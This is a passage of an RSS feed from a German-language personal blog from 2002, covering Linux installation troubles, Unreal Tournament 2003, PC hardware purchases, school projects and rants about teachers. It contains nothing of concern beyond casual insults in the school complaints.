  16480.    <description><![CDATA[Die LAN-Party ist am Samstag zu Ende gegangen. Nun habe ich Zeit mich wieder dem Basteln zu widmen ;-)<br>Nachdem ich bei <a href=""><b>Gentoo Linux 1.2</b></a> bis zur Installtion von X gekommen bin und dann doch nicht weiter, habe ich mich mal mit <a href=""><b>Debian 3.0</b></a>  versucht. Dort bin ich auch etwa an gleicher Stelle nicht mehr weiter gekommen. Habe dann ein <a href=""><b>Root Linux 1.2</b></a>, das gerade rumgelegen hat, installiert und dort habe ich noch schneller aufgegeben. Nun läuft wieder die Press-Edition von <a href=""><b>Redhat 7.3</b></a>. Beim installieren wollen von <a href=""><b>Garnome</b></a> kam die wunderschöne Meldung: <pre>bash: make: command not found</pre><br>Blöde Press-Edition. Nun bastel ich weiter; irgendwie wirds schon gehen (Neuaufsetzen). Dabei will ich doch nur auch <b><a href="">so einen schönen Desktop</a></b> haben ;-)
  16481. ]]></description>
  16482.    <content:encoded><![CDATA[Die LAN-Party ist am Samstag zu Ende gegangen. Nun habe ich Zeit mich wieder dem Basteln zu widmen ;-)<br>Nachdem ich bei <a href=""><b>Gentoo Linux 1.2</b></a> bis zur Installtion von X gekommen bin und dann doch nicht weiter, habe ich mich mal mit <a href=""><b>Debian 3.0</b></a>  versucht. Dort bin ich auch etwa an gleicher Stelle nicht mehr weiter gekommen. Habe dann ein <a href=""><b>Root Linux 1.2</b></a>, das gerade rumgelegen hat, installiert und dort habe ich noch schneller aufgegeben. Nun läuft wieder die Press-Edition von <a href=""><b>Redhat 7.3</b></a>. Beim installieren wollen von <a href=""><b>Garnome</b></a> kam die wunderschöne Meldung: <pre>bash: make: command not found</pre><br>Blöde Press-Edition. Nun bastel ich weiter; irgendwie wirds schon gehen (Neuaufsetzen). Dabei will ich doch nur auch <b><a href="">so einen schönen Desktop</a></b> haben ;-)
  16483. ]]></content:encoded>
  16484.  </item>
  16486.  <item>
  16487.    <title>UT 2003</title>
  16488.    <link></link>
  16489.    <guid isPermaLink="true"></guid>
  16490.    <dc:creator>Andreas Jaggi</dc:creator>
  16491.    <creativeCommons:license></creativeCommons:license>
  16492.    <pubDate>Thu, 03 Oct 2002 23:49:00 +0200</pubDate>
  16493.    <category domain="">Misc</category>
  16494.    <description><![CDATA[Meins! Mit Tasche, T-Shirt und UT-Energy-Getränk.
  16495. ]]></description>
  16496.    <content:encoded><![CDATA[Meins! Mit Tasche, T-Shirt und UT-Energy-Getränk.
  16497. ]]></content:encoded>
  16498.  </item>
  16500.  <item>
  16501.    <title>Stress - Ferienbeginn</title>
  16502.    <link></link>
  16503.    <guid isPermaLink="true"></guid>
  16504.    <dc:creator>Andreas Jaggi</dc:creator>
  16505.    <creativeCommons:license></creativeCommons:license>
  16506.    <pubDate>Mon, 30 Sep 2002 11:52:00 +0200</pubDate>
  16507.    <category domain="">Misc</category>
  16508.    <description><![CDATA[Seit meinem letzten Eintrag ist einiges (für mich) wichtiges vonstatten gegangen, das ich euch nicht vorenthalten möchte.<br><br><b>Mittwoch, 18.9.</b><br>2 h Schlaf, wegen Maturaarbeit machen - ganzer Tag daran weitermachen.<br><br><b>Donnerstag, 19.9.</b><br>Nix Schlaf, wegen Maturaarbeit. Morgens um 7 endlich finale Version fertig ausgedruckt (Latein 7.30-9.05 muss ausfallen;). Danach Probe in Französisch, was ich am Morgen im Zug nur 1h gelernt hatte (Ja Frau N., es wird eine sauschlechte Note geben).<br>Elternabend. Geht voll in die Hose, weil "Schinkengipfeli" doch nicht Mikrowellentauglich sind und die Eltern infolge der schlechten Vorbereitung null Informationen bekommen. Nutzen = 0.<br><br><b>Freitag, 20.9.</b><br>Normaler Schultag. Schlafe andauernd fast ein (Weshalb wohl? ;-).<br>Am Abend spontaner Entscheid zum Besuch eines Konzerts "Closed Air" in meinem Dorf (Kaff). <a href="" target="_blank"><b>Chickennuggets</b></a> (schlecht) und <a href=""><b>Openseason</b></a> (gut) spielen. Die Qualität der Bands ist vergleichbar mit der Qualität der entsprechenden Websites.<br><br><b>Samstag, 21.9.</b><br>Um 3 zurück von konzert und ab ins Bett bis 13 Uhr. Am Nachmittag Chillout betreiben.<br>Wieder ein spontaner Entscheid zum Partymachen bei Ramon. Also, in nächsten Zug gesetzt und ab nach Steffisburg (1.5 h). Im Verlauf des Abends sind wir auf <a href="" target="_blank" title="Growl Karaoke auf YouTube"><b>dieses "Growl-Karaoke"</b></a> gestossen.<br><br><b>Sonntag, 22.9.</b><br>4 Uhr in Steffisburg einschlafen und um 10 wieder auf und zurück nach Hause (12.00). Packen für Projektwoche Bordeaux.<br>Um 18 Uhr knapp den Zug nicht verpassen. Zusammentreffen mit den anderen unterwegs. Grenzüberschreitung in Genf; umsteigen in Schlafwagen. "Couchette" nennt sich das und ist saueng. Dementsprechend langer Aufenthalt im Gang und kurzer Schlaf. Wobei von erholsamem Schlaf keine Rede ist: dauernd wird man in irgendeine Richtung geschubst und stösst an die Wand, Decke etc.<br><br><b>Montag, 23.9.</b><br>5.15 Uhr Wecken im Couchette. Danach Umsteigen in Toulouse in einen normaleren Zug, mit verstellbaren Sitzen, die so kurze Kopfstützen haben, dass sich jeder die Wirbelsäule verbiegen muss, um einigermassen bequem liegen zu können. So um 8 Uhr Ankunft in <a href=""><b>Bordeaux</b></a>; total verspannt, verkatert, verrenkt ...
  16509. ]]></description>
  16510.    <content:encoded><![CDATA[Seit meinem letzten Eintrag ist einiges (für mich) wichtiges vonstatten gegangen, das ich euch nicht vorenthalten möchte.<br><br><b>Mittwoch, 18.9.</b><br>2 h Schlaf, wegen Maturaarbeit machen - ganzer Tag daran weitermachen.<br><br><b>Donnerstag, 19.9.</b><br>Nix Schlaf, wegen Maturaarbeit. Morgens um 7 endlich finale Version fertig ausgedruckt (Latein 7.30-9.05 muss ausfallen;). Danach Probe in Französisch, was ich am Morgen im Zug nur 1h gelernt hatte (Ja Frau N., es wird eine sauschlechte Note geben).<br>Elternabend. Geht voll in die Hose, weil "Schinkengipfeli" doch nicht Mikrowellentauglich sind und die Eltern infolge der schlechten Vorbereitung null Informationen bekommen. Nutzen = 0.<br><br><b>Freitag, 20.9.</b><br>Normaler Schultag. Schlafe andauernd fast ein (Weshalb wohl? ;-).<br>Am Abend spontaner Entscheid zum Besuch eines Konzerts "Closed Air" in meinem Dorf (Kaff). <a href="" target="_blank"><b>Chickennuggets</b></a> (schlecht) und <a href=""><b>Openseason</b></a> (gut) spielen. Die Qualität der Bands ist vergleichbar mit der Qualität der entsprechenden Websites.<br><br><b>Samstag, 21.9.</b><br>Um 3 zurück von konzert und ab ins Bett bis 13 Uhr. Am Nachmittag Chillout betreiben.<br>Wieder ein spontaner Entscheid zum Partymachen bei Ramon. Also, in nächsten Zug gesetzt und ab nach Steffisburg (1.5 h). Im Verlauf des Abends sind wir auf <a href="" target="_blank" title="Growl Karaoke auf YouTube"><b>dieses "Growl-Karaoke"</b></a> gestossen.<br><br><b>Sonntag, 22.9.</b><br>4 Uhr in Steffisburg einschlafen und um 10 wieder auf und zurück nach Hause (12.00). Packen für Projektwoche Bordeaux.<br>Um 18 Uhr knapp den Zug nicht verpassen. Zusammentreffen mit den anderen unterwegs. Grenzüberschreitung in Genf; umsteigen in Schlafwagen. "Couchette" nennt sich das und ist saueng. Dementsprechend langer Aufenthalt im Gang und kurzer Schlaf. Wobei von erholsamem Schlaf keine Rede ist: dauernd wird man in irgendeine Richtung geschubst und stösst an die Wand, Decke etc.<br><br><b>Montag, 23.9.</b><br>5.15 Uhr Wecken im Couchette. Danach Umsteigen in Toulouse in einen normaleren Zug, mit verstellbaren Sitzen, die so kurze Kopfstützen haben, dass sich jeder die Wirbelsäule verbiegen muss, um einigermassen bequem liegen zu können. So um 8 Uhr Ankunft in <a href=""><b>Bordeaux</b></a>; total verspannt, verkatert, verrenkt ...
  16511. ]]></content:encoded>
  16512.  </item>
  16514.  <item>
  16515.    <title>Ahh... Ohh... Uhh...</title>
  16516.    <link></link>
  16517.    <guid isPermaLink="true"></guid>
  16518.    <dc:creator>Andreas Jaggi</dc:creator>
  16519.    <creativeCommons:license></creativeCommons:license>
  16520.    <pubDate>Tue, 17 Sep 2002 21:11:00 +0200</pubDate>
  16521.    <category domain="">Tech</category>
  16522.    <description><![CDATA[Heute ist mein neues Gehäuse angekommen.<br><br><img src="" alt="Avance Midi Tower B031-TI Titan"><br><br>Bestellt bei <a href="" target="_blank"><b></b></a> konnte ich von den europöischen 16% Mwst. 8.4 % einsparen und musste nur die 7.6 % CH-Mwst. zahlen. Einkaufen in anderen Ländern lohnt sich also :-)<br>Zum Gehäuse kann ich nur sagen: <b>Erste Sahne !!!</b><br>Im Tageslicht sieht es aus wie aus Spiegeln gemacht, im Dunkeln - unterm Tisch - ist es schwarz wie die Nacht.<br>Der Computer ist hörbar leiser, obwohl 2 zusätzliche Lüfter hinzugekommen sind! Liegt vermutlich am neuen Netzteil. Ein/Umbau ging problemlos vonstatten. Gestern habe ich (endlich) eine neue Festplatte bestellt. Eine Samsung SpinPoint P40 - 80 GB. Wurde auch langsam Zeit, da <a href=""><b>solches</b></a> passiert war. Habe mich dann heute schön erschrocken, als ich <a href="" target="_blank"><b>diesen Artikel</b></a> entdeckte. Konnte mich dann aber beruhigen, weil da Samsung nicht mitzieht und immernoch 3 Jahre Garantie bietet. Schlechter ists da dem <a href=""><b>Michael</b></a> ergangen.
  16523. ]]></description>
  16524.    <content:encoded><![CDATA[Heute ist mein neues Gehäuse angekommen.<br><br><img src="" alt="Avance Midi Tower B031-TI Titan"><br><br>Bestellt bei <a href="" target="_blank"><b></b></a> konnte ich von den europöischen 16% Mwst. 8.4 % einsparen und musste nur die 7.6 % CH-Mwst. zahlen. Einkaufen in anderen Ländern lohnt sich also :-)<br>Zum Gehäuse kann ich nur sagen: <b>Erste Sahne !!!</b><br>Im Tageslicht sieht es aus wie aus Spiegeln gemacht, im Dunkeln - unterm Tisch - ist es schwarz wie die Nacht.<br>Der Computer ist hörbar leiser, obwohl 2 zusätzliche Lüfter hinzugekommen sind! Liegt vermutlich am neuen Netzteil. Ein/Umbau ging problemlos vonstatten. Gestern habe ich (endlich) eine neue Festplatte bestellt. Eine Samsung SpinPoint P40 - 80 GB. Wurde auch langsam Zeit, da <a href=""><b>solches</b></a> passiert war. Habe mich dann heute schön erschrocken, als ich <a href="" target="_blank"><b>diesen Artikel</b></a> entdeckte. Konnte mich dann aber beruhigen, weil da Samsung nicht mitzieht und immernoch 3 Jahre Garantie bietet. Schlechter ists da dem <a href=""><b>Michael</b></a> ergangen.
  16525. ]]></content:encoded>
  16526.  </item>
  16528.  <item>
  16529.    <title>5 ... 4 ... 3 ... 2 ... 1 ... Tada!</title>
  16530.    <link></link>
  16531.    <guid isPermaLink="true"></guid>
  16532.    <dc:creator>Andreas Jaggi</dc:creator>
  16533.    <creativeCommons:license></creativeCommons:license>
  16534.    <pubDate>Tue, 17 Sep 2002 02:57:00 +0200</pubDate>
  16535.    <category domain="">School</category>
  16536.    <description><![CDATA[<a href=""><b>Hier</b></a> ist nun die Praxisarbeit meiner Maturaarbeit - eine Website. Genauer gesagt ist dort vorerst nur das Design. Wer den Inhalt will, bitte <a href="" target="_blank"><b>hier</b></a> schauen.<br>Die Website entstand/entsteht zum Thema Usability.<br>Daher bitte Verbesserungsvorschläge abgeben!
  16537. ]]></description>
  16538.    <content:encoded><![CDATA[<a href=""><b>Hier</b></a> ist nun die Praxisarbeit meiner Maturaarbeit - eine Website. Genauer gesagt ist dort vorerst nur das Design. Wer den Inhalt will, bitte <a href="" target="_blank"><b>hier</b></a> schauen.<br>Die Website entstand/entsteht zum Thema Usability.<br>Daher bitte Verbesserungsvorschläge abgeben!
  16539. ]]></content:encoded>
  16540.  </item>
  16542.  <item>
  16543.    <title>dHd - PHP</title>
  16544.    <link></link>
  16545.    <guid isPermaLink="true"></guid>
  16546.    <dc:creator>Andreas Jaggi</dc:creator>
  16547.    <creativeCommons:license></creativeCommons:license>
  16548.    <pubDate>Sun, 15 Sep 2002 23:20:00 +0200</pubDate>
  16549.    <category domain="">Coding</category>
  16550.    <description><![CDATA[<a href="" target="_blank"><b>Hier</b></a> sieht das mit PHP und SOAP so einfach aus, dass sogar ich ein bisschen drausgekommen bin. Bei Gelegenheit (wenn Maturaarbeit feritg) ausdrucken.<br><br>Und das <a href="" target="_blank"><b>hier</b></a> sieht auch sehr interessant aus.<br><br>Beides geklaut vom <a href="" target="_blank"><b>Schockwellenreiter</b></a>.
  16551. ]]></description>
  16552.    <content:encoded><![CDATA[<a href="" target="_blank"><b>Hier</b></a> sieht das mit PHP und SOAP so einfach aus, dass sogar ich ein bisschen drausgekommen bin. Bei Gelegenheit (wenn Maturaarbeit feritg) ausdrucken.<br><br>Und das <a href="" target="_blank"><b>hier</b></a> sieht auch sehr interessant aus.<br><br>Beides geklaut vom <a href="" target="_blank"><b>Schockwellenreiter</b></a>.
  16553. ]]></content:encoded>
  16554.  </item>
  16556.  <item>
  16557.    <title>ut2003</title>
  16558.    <link></link>
  16559.    <guid isPermaLink="true"></guid>
  16560.    <dc:creator>Andreas Jaggi</dc:creator>
  16561.    <creativeCommons:license></creativeCommons:license>
  16562.    <pubDate>Sun, 15 Sep 2002 02:42:00 +0200</pubDate>
  16563.    <category domain="">Linux</category>
  16564.    <description><![CDATA[sehr schön finde ich, dass es ut 2003 auch für linux gibt. muss ich mal ausprobieren. vermutlich werde ich es aber nicht zum laufen kriegen ;-)<br><br>Unter Windows:<br>
  16565. ut2003.ini<br><br>
  16566. Language=det - grünes blut
  16567. <br>Language=eng - rotes blut
  16568. <br><br>;-)
  16569. ]]></description>
  16570.    <content:encoded><![CDATA[sehr schön finde ich, dass es ut 2003 auch für linux gibt. muss ich mal ausprobieren. vermutlich werde ich es aber nicht zum laufen kriegen ;-)<br><br>Unter Windows:<br>
  16571. ut2003.ini<br><br>
  16572. Language=det - grünes blut
  16573. <br>Language=eng - rotes blut
  16574. <br><br>;-)
  16575. ]]></content:encoded>
  16576.  </item>
  16578.  <item>
  16579.    <title>Feiger gehts nicht mehr ...</title>
  16580.    <link></link>
  16581.    <guid isPermaLink="true"></guid>
  16582.    <dc:creator>Andreas Jaggi</dc:creator>
  16583.    <creativeCommons:license></creativeCommons:license>
  16584.    <pubDate>Sat, 14 Sep 2002 18:50:00 +0200</pubDate>
  16585.    <category domain="">School</category>
  16586.    <description><![CDATA[Wird eine gewisse feige Person auf eine von ihr erfolgte schriftliche (da zu feige um mündlich etwas zu kritisieren) Reklamation angesprochen so heisst es, dass mit der schriftlichen Reklamation nicht jeder der Gruppe gemeint gewesen sei und dass man persönlich sich davon ausschliessen könne.<br>Wird jene feige Person aber von jemandem anderen der Gruppe auf die schriftliche Reklamation angesprochen, so erfolgt wieder die gleiche Antwort (nicht jeder gemeint, sich persoenlich davon ausnehmen etc.) und zusätzlich wird argumentiert, dass beispielsweise die Person (welche vorher mit der feigen Person gesprochen hatte und sich von der schriftlichen Reklamation ausnehmen könne) ihre Aufgaben nicht gemacht habe und diese mit der schriftlichen Reklamation gemeint sei!!!!<br>So geschehen an <a href=""><b>diesem Gymnasium</b></a>!<br><br>Herr ?? sie sind ein verdammtes Arschloch!<br>[Hier die schlimmstmöglichen Flüche, Beschimpfungen etc. einfügen und x mal wiederholen!]
  16587. ]]></description>
  16588.    <content:encoded><![CDATA[Wird eine gewisse feige Person auf eine von ihr erfolgte schriftliche (da zu feige um mündlich etwas zu kritisieren) Reklamation angesprochen so heisst es, dass mit der schriftlichen Reklamation nicht jeder der Gruppe gemeint gewesen sei und dass man persönlich sich davon ausschliessen könne.<br>Wird jene feige Person aber von jemandem anderen der Gruppe auf die schriftliche Reklamation angesprochen, so erfolgt wieder die gleiche Antwort (nicht jeder gemeint, sich persoenlich davon ausnehmen etc.) und zusätzlich wird argumentiert, dass beispielsweise die Person (welche vorher mit der feigen Person gesprochen hatte und sich von der schriftlichen Reklamation ausnehmen könne) ihre Aufgaben nicht gemacht habe und diese mit der schriftlichen Reklamation gemeint sei!!!!<br>So geschehen an <a href=""><b>diesem Gymnasium</b></a>!<br><br>Herr ?? sie sind ein verdammtes Arschloch!<br>[Hier die schlimmstmöglichen Flüche, Beschimpfungen etc. einfügen und x mal wiederholen!]
  16589. ]]></content:encoded>
  16590.  </item>
  16592.  <item>
  16593.    <title>UT 2003</title>
  16594.    <link></link>
  16595.    <guid isPermaLink="true"></guid>
  16596.    <dc:creator>Andreas Jaggi</dc:creator>
  16597.    <creativeCommons:license></creativeCommons:license>
  16598.    <pubDate>Sat, 14 Sep 2002 18:17:00 +0200</pubDate>
  16599.    <category domain="">Misc</category>
  16600.    <description><![CDATA[Verschlafen wie ich bin, habe ich erst jetzt bemerkt, dass seit heute Morgen eine (offizielle ;-) Demo von UT 2003 im Netz ist. Hoffentlich erscheint nun auch bald die Vollversion. Habe schon genug lange gewartet.
  16601. ]]></description>
  16602.    <content:encoded><![CDATA[Verschlafen wie ich bin, habe ich erst jetzt bemerkt, dass seit heute Morgen eine (offizielle ;-) Demo von UT 2003 im Netz ist. Hoffentlich erscheint nun auch bald die Vollversion. Habe schon genug lange gewartet.
  16603. ]]></content:encoded>
  16604.  </item>
  16606.  <item>
  16607.    <title>Kindergarten</title>
  16608.    <link></link>
  16609.    <guid isPermaLink="true"></guid>
  16610.    <dc:creator>Andreas Jaggi</dc:creator>
  16611.    <creativeCommons:license></creativeCommons:license>
  16612.    <pubDate>Mon, 09 Sep 2002 21:53:00 +0200</pubDate>
  16613.    <category domain="">School</category>
  16614.    <description><![CDATA[<a href=""><b>So</b></a> kommt es, wenn Lehrer Kindergarten spielen.<br>Das Schönste daran ist jedoch, dass mir der Herr KO am besagten Freitag selbst versichert hat, dass es genügt, wenn ich ihm eine nachbearbeitete Version des Stadtplans von Bordeaux als Kopiervorlage abgebe. Aus dem Gespräch ist ganz klar (und mit beidseitiger Zustimmung) herausgegangen, dass ich diese Vorlage <b>nicht</b> am Freitag schon abgeben muss!<br><br>Es ist leider bedauerlich, dass gewisse Lehrpersonen nicht fähig sind einem mündlich etwas mitzuteilen und stattdessen ihre Unstimmigkeit nur <b>ganz feige und unfair</b> schriftlich mitteilen können.<br>Es gibt gewisse Lehrpersonen an <a href=""><b>diesem Gymnasium</b></a> die IMHO inkompetent und verdammt feige sind! [Hier ein besonders böses Schimpfwort einfügen]!
  16615. ]]></description>
  16616.    <content:encoded><![CDATA[<a href=""><b>So</b></a> kommt es, wenn Lehrer Kindergarten spielen.<br>Das Schönste daran ist jedoch, dass mir der Herr KO am besagten Freitag selbst versichert hat, dass es genügt, wenn ich ihm eine nachbearbeitete Version des Stadtplans von Bordeaux als Kopiervorlage abgebe. Aus dem Gespräch ist ganz klar (und mit beidseitiger Zustimmung) herausgegangen, dass ich diese Vorlage <b>nicht</b> am Freitag schon abgeben muss!<br><br>Es ist leider bedauerlich, dass gewisse Lehrpersonen nicht fähig sind einem mündlich etwas mitzuteilen und stattdessen ihre Unstimmigkeit nur <b>ganz feige und unfair</b> schriftlich mitteilen können.<br>Es gibt gewisse Lehrpersonen an <a href=""><b>diesem Gymnasium</b></a> die IMHO inkompetent und verdammt feige sind! [Hier ein besonders böses Schimpfwort einfügen]!
  16617. ]]></content:encoded>
  16618.  </item>
  16620.  <item>
  16621.    <title>What revolution Are You?</title>
  16622.    <link></link>
  16623.    <guid isPermaLink="true"></guid>
  16624.    <dc:creator>Andreas Jaggi</dc:creator>
  16625.    <creativeCommons:license></creativeCommons:license>
  16626.    <pubDate>Sat, 07 Sep 2002 00:52:00 +0200</pubDate>
  16627.    <category domain="">Misc</category>
  16628.    <description><![CDATA[<br><img src="" width="340" height="180" alt="computer revolution"><br><br><a href="" target="_blank"><b>What revolution Are You?</b></a><br>Gefunden bei <a href=""><b></b></a>
  16629. ]]></description>
  16630.    <content:encoded><![CDATA[<br><img src="" width="340" height="180" alt="computer revolution"><br><br><a href="" target="_blank"><b>What revolution Are You?</b></a><br>Gefunden bei <a href=""><b></b></a>
  16631. ]]></content:encoded>
  16632.  </item>
  16634.  <item>
  16635.    <title>phptutorial</title>
  16636.    <link></link>
  16637.    <guid isPermaLink="true"></guid>
  16638.    <dc:creator>Andreas Jaggi</dc:creator>
  16639.    <creativeCommons:license></creativeCommons:license>
  16640.    <pubDate>Sat, 07 Sep 2002 00:39:00 +0200</pubDate>
  16641.    <category domain="">Coding</category>
  16642.    <description><![CDATA[Beim durchsurfen der Referrer ist mir in einem Googlequery <a href="" target="_blank"><b>dieses Tutorial/Artikel über PHP</b></a> ins Auge gestochen. Eine IMHO gute Erklärung für Neueinstieger/Umsteiger.
  16643. ]]></description>
  16644.    <content:encoded><![CDATA[Beim durchsurfen der Referrer ist mir in einem Googlequery <a href="" target="_blank"><b>dieses Tutorial/Artikel über PHP</b></a> ins Auge gestochen. Eine IMHO gute Erklärung für Neueinstieger/Umsteiger.
  16645. ]]></content:encoded>
  16646.  </item>
  16648.  <item>
  16649.    <title>PH(P)un</title>
  16650.    <link></link>
  16651.    <guid isPermaLink="true"></guid>
  16652.    <dc:creator>Andreas Jaggi</dc:creator>
  16653.    <creativeCommons:license></creativeCommons:license>
  16654.    <pubDate>Fri, 06 Sep 2002 12:14:00 +0200</pubDate>
  16655.    <category domain="">Coding</category>
  16656.    <description><![CDATA[Via einem Link beim <a href="" target="_blank"><b>Schockwellenreiter</b></a> bin ich auf <a href="" target="_blank"><b>diesen Artikel</b></a> gestossen, welcher eine virtuelle Umwandlung von statischen in dynamische URLs beschreibt. Mit mod_rewrite!<br>Muss ich irgendwann einbauen, wann ich weniger Stress mit der Maturaarbeit habe. :-)
  16657. ]]></description>
  16658.    <content:encoded><![CDATA[Via einem Link beim <a href="" target="_blank"><b>Schockwellenreiter</b></a> bin ich auf <a href="" target="_blank"><b>diesen Artikel</b></a> gestossen, welcher eine virtuelle Umwandlung von statischen in dynamische URLs beschreibt. Mit mod_rewrite!<br>Muss ich irgendwann einbauen, wann ich weniger Stress mit der Maturaarbeit habe. :-)
  16659. ]]></content:encoded>
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  16663.    <title>Damit man einmal weniger klicken muss</title>
  16664.    <link></link>
  16665.    <guid isPermaLink="true"></guid>
  16666.    <dc:creator>Andreas Jaggi</dc:creator>
  16667.    <creativeCommons:license></creativeCommons:license>
  16668.    <pubDate>Thu, 05 Sep 2002 20:02:00 +0200</pubDate>
  16669.    <category domain="">Tech</category>
  16670.    <description><![CDATA[Da bei c't nicht direkt auf den entsprechenden Abschnitt gelinkt werden kann und ich die URLs noch länger aufheben will als bis zur nächsten c't Ausgabe, habe ich sie nun stinkfrech direkt aus dem Quelltext herauskopiert. :-)<br><br><a href=""></a><br>
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  16743. ]]></description>
  16744.    <content:encoded><![CDATA[Da bei c't nicht direkt auf den entsprechenden Abschnitt gelinkt werden kann und ich die URLs noch länger aufheben will als bis zur nächsten c't Ausgabe, habe ich sie nun stinkfrech direkt aus dem Quelltext herauskopiert. :-)<br><br><a href=""></a><br>
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  16821.    <title>Noch mehr E-Commerce ...</title>
  16822.    <link></link>
  16823.    <guid isPermaLink="true"></guid>
  16824.    <dc:creator>Andreas Jaggi</dc:creator>
  16825.    <creativeCommons:license></creativeCommons:license>
  16826.    <pubDate>Thu, 05 Sep 2002 19:54:00 +0200</pubDate>
  16827.    <category domain="">Tech</category>
  16828.    <description><![CDATA[Gestern, nach dem tödlichen Triathlon, welcher laut <b></b> eine Extremsportart ist, hatte ich mir die aktuelle Ausgabe von <a href="" target="_blank"><b>c't</b></a> gekauft und musste feststellen, dass auf Seite 112 unten links eine ähnliche Liste von Online-Shops steht, wie ich <a href="" target="_blank"><b>hier eine</b></a> gemacht hatte. Eine kleine Recherche ergab dann, dass <a href="" target="_blank"><b>hier</b></a> sämtliche Links des Artikels aufgelistet sind. Viel Vergnügen beim Preisvergleich!
  16829. ]]></description>
  16830.    <content:encoded><![CDATA[Gestern, nach dem tödlichen Triathlon, welcher laut <b></b> eine Extremsportart ist, hatte ich mir die aktuelle Ausgabe von <a href="" target="_blank"><b>c't</b></a> gekauft und musste feststellen, dass auf Seite 112 unten links eine ähnliche Liste von Online-Shops steht, wie ich <a href="" target="_blank"><b>hier eine</b></a> gemacht hatte. Eine kleine Recherche ergab dann, dass <a href="" target="_blank"><b>hier</b></a> sämtliche Links des Artikels aufgelistet sind. Viel Vergnügen beim Preisvergleich!
  16831. ]]></content:encoded>
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  16835.    <title>Das blaue Wunder</title>
  16836.    <link></link>
  16837.    <guid isPermaLink="true"></guid>
  16838.    <dc:creator>Andreas Jaggi</dc:creator>
  16839.    <creativeCommons:license></creativeCommons:license>
  16840.    <pubDate>Thu, 05 Sep 2002 19:32:00 +0200</pubDate>
  16841.    <category domain="">Misc</category>
  16842.    <description><![CDATA[Es zeugt IMHO von Qualität, wenn eine Wochenzeitung nicht nur folgende Themen beinhaltet:<br><br><a href=";category_id=60" target="_blank"><b>Amerikas Regierung redet vom Kampf gegen den Terror. In Wahrheit wird die Tragödie vom 11. September auch für knallharte Interessenpolitik genutzt.</b></a><br><br><a href=";category_id=62" target="_blank"><b>Der Friedensforscher Johan Galtung erklärt, warum Amerika im Kampf gegen das Böse bis zum Äussersten gehen wird und weshalb George W. Bush und Osama Bin Laden einander ähneln.</b></a><br><br><a href=";category_id=59" target="_blank"><b>Sie flüchten vor Armut, Unterdrückung und Willkür: Jährlich suchen rund 10000 russische Soldaten vor Ende der Dienstpflicht das Weite – oft mit Gewalt.</b></a><br><br>sondern auch Themen, die weltpolitisch keinen Einfluss haben wie z.B. dieses hier:<br><br><a href=";category_id=60" target="_blank"><b>Björk kommt von dort, Mick Jagger war schon dort, David Bowie möchte unbedingt hin. Islands Jugend hält trotzdem nichts von Reykjavík. Doch muss sie sich deswegen gleich die Seele aus dem Leib saufen?</b></a>
  16843. ]]></description>
  16844.    <content:encoded><![CDATA[Es zeugt IMHO von Qualität, wenn eine Wochenzeitung nicht nur folgende Themen beinhaltet:<br><br><a href=";category_id=60" target="_blank"><b>Amerikas Regierung redet vom Kampf gegen den Terror. In Wahrheit wird die Tragödie vom 11. September auch für knallharte Interessenpolitik genutzt.</b></a><br><br><a href=";category_id=62" target="_blank"><b>Der Friedensforscher Johan Galtung erklärt, warum Amerika im Kampf gegen das Böse bis zum Äussersten gehen wird und weshalb George W. Bush und Osama Bin Laden einander ähneln.</b></a><br><br><a href=";category_id=59" target="_blank"><b>Sie flüchten vor Armut, Unterdrückung und Willkür: Jährlich suchen rund 10000 russische Soldaten vor Ende der Dienstpflicht das Weite – oft mit Gewalt.</b></a><br><br>sondern auch Themen, die weltpolitisch keinen Einfluss haben wie z.B. dieses hier:<br><br><a href=";category_id=60" target="_blank"><b>Björk kommt von dort, Mick Jagger war schon dort, David Bowie möchte unbedingt hin. Islands Jugend hält trotzdem nichts von Reykjavík. Doch muss sie sich deswegen gleich die Seele aus dem Leib saufen?</b></a>
  16845. ]]></content:encoded>
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  16849.    <title>Triathlon</title>
  16850.    <link></link>
  16851.    <guid isPermaLink="true"></guid>
  16852.    <dc:creator>Andreas Jaggi</dc:creator>
  16853.    <creativeCommons:license></creativeCommons:license>
  16854.    <pubDate>Tue, 03 Sep 2002 23:27:00 +0200</pubDate>
  16855.    <category domain="">School</category>
  16856.    <description><![CDATA[Bevor ich elendlich daran zu Grunde gehen werde dürft ihr es auch noch erfahren:<br>Morgen ist Triathlon von der Prima meiner Schule. Mit den klassichen drei Disziplinen:<br><b>Ertrinken</b>, <b>LungeAusDemLeibRadeln</b> und <b>ZuTodeLaufen</b><br><br>Kondolenz-E-Mails bitte hierhin schicken: <a href="mailto:&#103;&#101;&#115;&#116;&#111;&#114;&#98;&#101;&#110;&#102;&#117;&#101;&#114;&#100;&#101;&#110;&#116;&#114;&#105;&#97;&#116;&#104;&#108;&#111;&#110;&#64;&#119;&#97;&#116;&#101;&#114;&#119;&#97;&#118;&#101;&#46;&#99;&#104;"><b></b></a>
  16857. ]]></description>
  16858.    <content:encoded><![CDATA[Bevor ich elendlich daran zu Grunde gehen werde dürft ihr es auch noch erfahren:<br>Morgen ist Triathlon von der Prima meiner Schule. Mit den klassichen drei Disziplinen:<br><b>Ertrinken</b>, <b>LungeAusDemLeibRadeln</b> und <b>ZuTodeLaufen</b><br><br>Kondolenz-E-Mails bitte hierhin schicken: <a href="mailto:&#103;&#101;&#115;&#116;&#111;&#114;&#98;&#101;&#110;&#102;&#117;&#101;&#114;&#100;&#101;&#110;&#116;&#114;&#105;&#97;&#116;&#104;&#108;&#111;&#110;&#64;&#119;&#97;&#116;&#101;&#114;&#119;&#97;&#118;&#101;&#46;&#99;&#104;"><b></b></a>
  16859. ]]></content:encoded>
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  16863.    <title>Online-PC-Shops</title>
  16864.    <link></link>
  16865.    <guid isPermaLink="true"></guid>
  16866.    <dc:creator>Andreas Jaggi</dc:creator>
  16867.    <creativeCommons:license></creativeCommons:license>
  16868.    <pubDate>Tue, 03 Sep 2002 22:45:00 +0200</pubDate>
  16869.    <category domain="">Tech</category>
